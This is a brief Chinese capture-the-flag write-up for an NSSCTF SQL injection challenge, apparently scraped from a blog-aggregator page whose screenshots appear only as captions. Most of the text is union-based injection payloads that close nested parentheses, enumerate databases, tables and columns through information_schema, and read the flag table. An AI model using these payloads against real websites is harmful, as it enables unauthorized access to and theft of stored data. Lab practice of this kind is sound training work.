NSSCTF 这是什么?SQL !注一下 !

开启环境:

 NSSCTF 这是什么?SQL !注一下 !_第1张图片

 直接提示了查询语句,sql注入:

?id=1)))))) union select 1,group_concat(schema_name) from information_schema.schemata–-+

得到数据库

NSSCTF 这是什么?SQL !注一下 !_第2张图片 ?id=1))))))union select 1,group_concat(table_name) from information_schema.tables where table_schema=‘ctftraining’--+

得到ctftraining中的表

NSSCTF 这是什么?SQL !注一下 !_第3张图片

 ?id=1))))))union select 1,group_concat(column_name) from information_schema.columns where table_schema=‘ctftraining’--+
爆出字段名

NSSCTF 这是什么?SQL !注一下 !_第4张图片

/?id=1))))))union select 1,flag from ctftraining.flag--+
联合查询得到flag值

NSSCTF 这是什么?SQL !注一下 !_第5张图片

 NSSCTF 这是什么?SQL !注一下 !_第6张图片

你可能感兴趣的:(sql,mybatis,数据库)